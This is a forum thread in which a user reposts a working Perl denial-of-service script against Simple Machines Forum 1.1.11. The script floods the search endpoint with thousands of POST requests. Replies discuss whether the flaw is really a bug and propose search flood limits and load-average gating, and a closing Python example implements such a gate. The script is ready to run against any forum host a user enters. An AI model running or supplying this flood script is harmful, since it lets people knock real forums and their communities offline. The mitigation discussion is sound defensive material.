[Exploit smf 1.1.11] Multiple search DDOS

Started by KinG-InFeT, September 06, 2010, 03:52:18 AM


KinG-InFeT

######################################
[+] Exploit Title: Simple Machines Forums (SMF 1.1.11) Multiple Search DDOS
[+] Date: 2010-02-11
[+] Author: Ashiyane Digital Security Members (Cair3x)
[+] Software Link: http://www.simplemachines.org/
[+] Version: 1.1.11 And All Version
[+] Tested on: All
######################################

#!/usr/bin/perl

use IO::Socket;

print q{

##################################################

# He Smf Full Ver ha ha ha  Multiple Search DOS #

# Tested on SMF 1.1.11 - 1.1.11 #

# Created By Cair3x ! ;) #

##################################################



[ Script ]



};

$rand=rand(10);

print "Forum Host: ";

$serv = <stdin>;

chop ($serv);

print "Forum Path: ";

$path = <stdin>;

chop ($path);

for ($i=0; $i<9999; $i++)

{

$postit = "search=Cair3x+Cairex+Cair3x+Cair3x+Of+Iran+$x+ &search_terms=any&search_author=&search_forum=-1&search_time =0&search_fields=msgonly&search_cat=-1&sort_by=0&sort_dir=AS C&show_results=posts&return_chars=200";



$lrg = length $postit;



my $sock = new IO::Socket::INET (

PeerAddr => "$serv",

PeerPort => "80",

Proto => "tcp",

);

die "nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!n" unless $sock;



print $sock "POST $path"."index.php?action=search2 HTTP/1.1n";

print $sock "Host: $servn";

print $sock "Accept: text/_xml,application/_xml,application/xhtml+_xml,text/html;q=0 .9,text/plain;q=0.8,image/png,*/*;q=0.5n";

print $sock "Referer: $servn";

print $sock "Accept-Language: en-usn";

print $sock "Content-Type: application/x-www-form-urlencodedn";

print $sock "Accept-Encoding: gzip, deflaten";

print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4n";

print $sock "Connection: Keep-Aliven";

print $sock "Cache-Control: no-cachen";

print $sock "Content-Length: $lrgnn";

print $sock "$postitn";

close($sock);



## Print a "+" for every loop

syswrite STDOUT, "+";

}

print "Forum Be Fuke Raft. Test Konid ...n";



[ / Script ]



######################################
BY : Cair3x [[email protected]]
Web Site : Ashiyane.org
Forum : Http://Ashiyane.org/forums/
[+] Greetz to All Ashiyane Digital Security Members (And Virangar Good Friends)
######################################


fix?


Oya

can't fix this

this applies to any system that does search when there isn't lots of servers to handle the load

Kindred

I am not sure if this counts as an "exploit", especially since the same sort of crap could be done by script to just about ANY site running a script with db search capability....
Glory to Ukraine

Please do not PM, IM or Email me with support questions.  You will get better and faster responses in the support boards.  Thank you.

"Loki is not evil, although he is certainly not a force for good. Loki is... complicated."

emanuele

Would it make sense to have a spamProtection like in SMF2?


Take a peek at what I'm doing! ;D




Need support in Italian?

Help us help you: explain your problem well: no, "it doesn't work" is not an explanation!!
1) What you do,
2) what you expect,
3) what you get.

Trekkie101

SMF 2.0 stops this, also 1.1 can stop it with the form locks in the DB for high load.

Maybe just add a load average for searching in the default DB schema?

Else natural progression of the software has eradicated this, no longer a bug?
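
The two mitigations raised in the replies, a per-client search flood limit in the spirit of SMF 2's spamProtection and refusing searches above a load average, can be modelled as one gate in front of the search handler. This is an added example, not SMF code and not something posted in the thread; the class name, thresholds and sample traffic are assumptions.

```python
from dataclasses import dataclass, field

# Assumed thresholds for illustration; tune per deployment.
MIN_INTERVAL = 5.0   # seconds a client must wait between accepted searches
MAX_LOAD = 4.0       # 1-minute load average at which search is refused


@dataclass
class SearchGate:
    """Decides whether an expensive search request may reach the database."""
    min_interval: float = MIN_INTERVAL
    max_load: float = MAX_LOAD
    last_seen: dict = field(default_factory=dict)  # client -> time of last accepted search

    def check(self, client: str, now: float, load: float) -> str:
        """Return 'ok', 'busy' (server overloaded) or 'flood' (client too fast).

        `load` is supplied by the caller, e.g. os.getloadavg()[0] on Unix.
        """
        # Global gate: shed search work before the database is saturated.
        if load >= self.max_load:
            return "busy"
        # Per-client gate: at most one accepted search per min_interval.
        last = self.last_seen.get(client)
        if last is not None and now - last < self.min_interval:
            return "flood"
        self.last_seen[client] = now
        return "ok"

    def prune(self, now: float) -> None:
        """Forget clients idle longer than the interval so the table stays bounded."""
        cutoff = now - self.min_interval
        self.last_seen = {c: t for c, t in self.last_seen.items() if t >= cutoff}


def replay(gate, requests, load=0.5):
    """Run constructed (client, timestamp) pairs through the gate and tally outcomes."""
    tally = {"ok": 0, "busy": 0, "flood": 0}
    for client, ts in requests:
        tally[gate.check(client, ts, load)] += 1
    return tally


if __name__ == "__main__":
    # Constructed traffic: one client sending 100 searches 0.25 s apart,
    # plus a normal user searching twice, 30 s apart.
    burst = [("198.51.100.7", i * 0.25) for i in range(100)]
    normal = [("203.0.113.20", 1.0), ("203.0.113.20", 31.0)]
    print(replay(SearchGate(), sorted(burst + normal, key=lambda r: r[1])))
```

The per-client limit alone still lets each distinct source run one search per interval, which is why the load-average gate is kept as a second, global check.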
